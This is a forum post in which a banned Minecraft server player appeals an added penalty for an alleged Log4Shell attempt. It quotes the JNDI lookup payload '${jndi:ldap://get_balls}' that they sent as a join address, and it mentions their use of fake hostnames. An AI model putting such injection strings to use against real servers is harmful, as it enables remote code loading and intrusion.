Hey guys,
So if you haven't heard about a month ago I was banned from the network for "Abuse of an **exploit** in Plan to create fake hostnames.", while this is partly true some hostnames I joined with were legitimate and probably expired when they were checked (looking at "tf.nocom.pro" specifically) but that is not what I'm coming to talk about but it's rather something different. So basically I only got banned 2 months for doing this fake hostname stuff but my ban is 6 months in duration, the reason for this is that 4 months were added on for attempting for trying to "exploit the server using Log4Shell" which is simply not true with evidence to support from my side that the server would have not been vulnerable at the time. I connected with the log4j string (the string in question is "${jndi:ldap://get_balls}") on the 12th of April (2022), this was at the same time I connected with the other addresses leading to the 2 months but theres a few issues:
1. Log4Shell (CVE-2021-44228) was discovered on the 21st of November (2021) and received patches to the affected libraries in the 6th of December (2021), now following from a security standpoint many libraries that use Log4J would have been updated instantly on this date or shortly after this date, there is NO reason to have this unpatched 4 months LATER on any part of a system using Log4J, all people who play minecraft would have received an updated version too which patches this on the client-side.
2. Now I don't think Plan is logging anything with Log4J to the logs, so there should be no issue right? If that is the case Plan would have not responded to such addresses (if I logged in during the vulnerable period which is unlikely since I didn't want to touch Minecraft while such an exploit was roaming around freely) and there should be no reason to respond to this, now it may have affected clientside stuff but it should not have done anything since why would you want to log join addresses in the first place to a log?
3. The following target "get_balls" is un-resolvable and does not exist and is a clearly implied joke as the words suggest, unless it has been routed internally to lead to somewhere it would not have and if somehow parts of the server were still vulnerable from this 4 months later (this would have been extremely unlikely for reasons I will cover in the next point) it would have simply just thrown a harmless error in console and server operation would have continued as normal with no effects, why this was considered to be able to exploit the server in the first place. I dont know.
4. From places in the TF Discord (developer discussion channel and announcements) server messages imply that the issue was made aware of and measures were taken on the TF Network at the time to mitigate such attacks like this, you can find this in the announcements channel on the discord server. I am assuming that TF would have taken action on mitigating Log4Shell and updating to safer versions of Paper so there is no real reason to say that it would have caused issues when I logged in with it on the 12th of April which relative to this date was 4 months later after all this stuff has occurred.
5. TotalFreedom would have updated stuff using Log4J such as plugins and server software (Paper/Scissors and all that) which include patched versions not affected by Log4Shell, so I am assuming Plan would have also updated but there is no reason to believe that issues would have been thrown by Plan since it should have no reason to be using the Log4J library when someone is connecting with a join address.
This is all the points I'd like to mention and now I have an image to prove that I joined with those addresses on that date from my active minecraft instance I have been using since October of 2021, you can view it at the bottom of this thread.
I used the "zgrep" command in linux which if you are not familiar is able to look through compressed archives (Minecraft stores logs in .log.gz files) and thus I was able to make it scrub through all of the log entries from ALL of my MultiMC instances to search for the ldap string, according to results shown by zgrep it appears there is three results from a log on the 12th of April in 2022 in the instance I stated I was using from October of 2021 above, I only used it three times and stopped using it after that as I had no more reasons to be joining with fake addresses. In the image I also open up the properties of the three compressed log archives which show the date the logs were last modified, but Minecraft logs show down to the second when something is happening and it is extremely unlikely I made this up as there is no way that you can remember events down to the second, especially something not important like this, you can also see the discovery date and patched date from a google tab in Firefox which shows the information about the CVE/exploit to accompany my points of the log4shell discovery date and patched date above. When this exploit was active I was watching it closely as I had some projects running on Java but were not using log4j but just in case I needed to update some dependencies. To also prove my point if you were to check the server logs at this date which would have been the hub server as there is no way to route to the freedom server directly you can see that I had logged in at these exact times shown in the Minecraft logs.
I'd also like to state that I clearly had no ill intentions of doing anything that would harm the server as that is not my thing, I respect the rules of online communities and in my case no such rules were broken but I may be mistaken, you would clearly know it was a joke and that no such address or thing exists with "get_balls".
I'd like if this was looked into a bit more but I'm trying to say that the server would have not been vulnerable from this.
I also apologize if this is in the wrong topic to publish this under as I don't really write forum posts often, this thread is replacing my "An issue regarding my ban" thread (which I haven't received much clarity on) with a more detailed one proving that I am not guilty of exploiting the server with this string.
Anyway this is all I've got to say and I'll see you soon,
Eva.
You may find the image I was talking about above below: